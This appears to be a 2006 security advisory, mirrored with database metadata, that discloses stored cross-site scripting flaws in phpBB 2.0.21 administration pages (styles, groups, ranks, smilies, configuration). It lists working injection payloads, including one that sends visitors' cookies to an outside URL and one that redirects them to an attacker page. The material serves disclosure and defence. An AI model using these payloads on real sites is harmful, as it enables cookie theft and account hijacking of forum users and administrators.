XSS phpBB 2.0.21 in administration

2006-07-24T00:00:00

Description

phpBB 2.0.21 XSS in administration ********************************** //-- By Blwood [renatrix@gmail.com] //-- [ http://www.blwood.net ] //-- Style Admin ----------- Management & Create a theme Lots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)... We cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1> but it's more interresting to inject javascript :) : "><body onload="alert('Owned by Blwood')"> => style_name "><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ... When an admin will go in Style Administration he will be Owned. (inject in style_name) When an admin will edit a them he will be Owned. Group Administration -------------------- Management Input group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script> When an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php by every visitors. An exploit could be : </textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script> or </textarea>"><script>document.location='http://site.com/ownedpage.html'</script> Ranks ----- Rank Administration Rank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script> But what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :) Now you can inject what you want but maximum 40 caracters... Smilies ------- Smiles Editing Utility Smiley Code : "><body onload="alert('Owned by Blwood')"> Configuration ------------- General Configuartion Inputs are not correctyle filtrated : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script> [ Video ] http://www.blwood.net/advisory/phpbb2021xssadmin.rar

{"id": "SECURITYVULNS:DOC:13542", "bulletinFamily": "software", "title": "XSS phpBB 2.0.21 in administration", "description": "phpBB 2.0.21 XSS in administration\r\n**********************************\r\n\r\n//-- By Blwood [renatrix@gmail.com]\r\n//-- [ http://www.blwood.net ]\r\n//-- \r\n\r\nStyle Admin\r\n-----------\r\n\r\nManagement & Create a theme\r\n\r\nLots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)...\r\n\r\nWe cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1> \r\nbut it's more interresting to inject javascript :) : \r\n"><body onload="alert('Owned by Blwood')"> => style_name\r\n"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...\r\nWhen an admin will go in Style Administration he will be Owned. (inject in style_name)\r\nWhen an admin will edit a them he will be Owned.\r\n\r\n\r\nGroup Administration\r\n--------------------\r\n\r\nManagement\r\n\r\nInput group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script>\r\nWhen an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php \r\nby every visitors.\r\nAn exploit could be : \r\n</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>\r\nor\r\n</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>\r\n\r\nRanks\r\n-----\r\n\r\nRank Administration\r\n\r\nRank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script>\r\nBut what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :)\r\nNow you can inject what you want but maximum 40 caracters...\r\n\r\n\r\n\r\nSmilies\r\n-------\r\n\r\nSmiles Editing Utility\r\n\r\nSmiley Code : "><body onload="alert('Owned by Blwood')">\r\n\r\nConfiguration\r\n-------------\r\n\r\nGeneral Configuartion\r\n\r\nInputs are not correctyle filtrated : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script>\r\n\r\n\r\n\r\n[ Video ]\r\n\r\nhttp://www.blwood.net/advisory/phpbb2021xssadmin.rar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "published": "2006-07-24T00:00:00", "modified": "2006-07-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13542", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 148, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6389"]}]}, "exploitation": null, "vulnersScore": 0.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659916711, "score": 1659917426}, "_internal": {"score_hash": "f643c75ffe8b5f9f7aa8e70d60d965d2"}}